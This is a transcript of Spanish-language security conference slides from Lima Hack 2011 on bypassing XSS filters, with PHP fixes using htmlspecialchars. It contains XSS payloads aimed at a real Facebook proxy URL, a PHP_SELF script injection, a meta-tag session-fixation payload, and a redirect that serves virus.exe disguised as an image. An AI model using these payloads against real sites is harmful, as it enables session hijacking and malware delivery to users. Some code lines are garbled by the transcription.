lima hack 2011

22

Upload: dedalo-sb

Post on 17-Jul-2015

4.357 views

Category:

Technology


0 download

TRANSCRIPT

Camilo Galdos Ayala AkA Dr.WhitePHPero de <3

aula Steve JobsC

amilo

Gald

os

AkA

Dr.W

hite

Bypassing Xss Filters¿Sentiste alguna vez que no había

Vulnerabilidad alguna en un sitio web?Hoy te enseñaré como saltar filtros para

Expl0tar Xss :)

¿Xss?

Cross Site Scripting , básicamente es un tipo de(in)seguridad Informática mediante la cual podemosejecutar códigos de script ya sea JavaScript oVBScript.

A la Acción y .

$_GET[‘vuln’];

Explotando Xss en variables por Método Get:

http://platform.ak.fbcdn.net/www/app_full_proxy.php?app=7146470109&v=1&size=o&cksum=221e4d237b450662edc3b7c73b4f54ee&src=http%3A%2F%2Fi55.tinypic.com%2F29y02nr.jpg

http://platform.ak.fbcdn.net/www/app_full_proxy.php?app=7146470109&v=1&size=o&cksum=221e4d237b450662edc3b7c73b4f54ee&src= http%3A%2F%2F3.bp.blogspot.com%2F-fZREhbOB7fY%2FTnDcigl9ubI%2FAAAAAAAAASo%2FG0aFyPYcfrY%2Fs320%2Flimahack2011.jpg

Código Fuente

<img src = “http://3.bp.blogspot.com/-fZREhbOB7fY/TnDcigl9ubI/AAAAAAAAASo/G0aFyPYcfrY/s320/limahack2011.jpg” />

Firewall Detected

http://platform.ak.fbcdn.net/www/app_full_proxy.php?app=7146470109&v=1&size=o&cksum=221e4d237b450662edc3b7c73b4f54ee&src= http%3A%2F%2Fkarebu.com%2Fimages%2Flogo%2Fdark%2FLogotipo2.png

Usando el… “Sentido Hacker”

http://platform.ak.fbcdn.net/www/app_full_proxy.php?app=7146470109&v=1&size=o&cksum=221e4d237b450662edc3b7c73b4f54ee&src= http%3A%2F%2F3.bp.blogspot.com%2F-fZREhbOB7fY%2FTnDcigl9ubI%2FAAAAAAAAASo%2FG0aFyPYcfrY%2Fs320%2Flimahack2011.jpg”

<img src = “http://3.bp.blogspot.com/-fZREhbOB7fY/TnDcigl9ubI/AAAAAAAAASo/G0aFyPYcfrY/s320/limahack2011.jpg” focus();“ />

Tan Simple como…

¡Xssed!

Ahora por dentro… Fixing

<?php$v = $_GET*‘var’+;?>

____________Repaired______________

<?php$v = htmlspecialchars($_GET*‘var’+);?>

- Str_replace();- htmlentities();- proper_func();- etc();

$_POST[‘vuln’];

Bueno ahora toca expl0tar por el lado del método POST, en este caso las variables están ocultas no las vemos a menos que usemos una tool puede ser Live Http Headers pero el bug sigue estando en un .php único.

http://exploitingexample.com/load.php Ese será el ejemplo.

Código Fuente

$name = $_POST['name'];

<input name=“name" id=“name" type="text" class="inputbox" alt="nombre" size="18" />

Echo $name;

Fixing…

$name = htmlspecialchars($_POST['name']);

En un Form no deben escribir nunca los datos que ingresaron en un txt y para validación, Usen Jquery.

$_SERVER['PHP_SELF']

<form action="<?=$_SERVER['PHP_SELF']?>" method=POST>

http://mybugsweb.com/contacto.php

¿404?

http://mybugsweb.com/contacto.php<script>alert(1);</script>

http://mybugsweb.com/contacto.php/”><script>alert(1);</script>

Fixing!

<form action=“Contacto.php" method=POST>

<form action="" method=POST>

if(isset($_POST['contactar']))

A Volvernos Malos >:)

http://mybugsweb.com/contacto.php/"><meta http-equiv=Set-Cookie content='sesfix=unmd5();; Expires=Tuesday,15-Nov-2012 00:00:00 GMT”; domain=.bugged.com'>

Session Fixation!!! Se Loguea y PWNED

A Volvernos Malos >:)

http://platform.ak.fbcdn.net/www/app_full_proxy.php?app=7146470109&v=1&size=o&cksum=221e4d237b450662edc3b7c73b4f54ee&src=http%3A%2F%2Fmalwaremaker.com%2Fvirus.jpg

redirect 301 /virus.jpg /virus.exe

http://www.facebook.com/l.php?u=http://www.facebook.com/l.php?u=http://platform.ak.fbcdn.net/www/app_full_proxy.php?app=7146470109&v=1&size=o&cksum=221e4d237b450662edc3b7c73b4f54ee&src=http%3A%2F%2Fgoogle.com%2logo.jpg”focus();&h=bAQFltC-7AQGdPe9w-LWlzh7JWFqTsIqGeW2octoqiMV4sg

A Volvernos Malos >:)

Uno persistente…Por Post… Taringa…

Vean el Video con Atención.

Gracias por participarmuy pronto estamos en provincias

para más información ingresa a nuestra web

En el 2012 mucho más de nosotros…

[email protected] – @SeguridadBlanca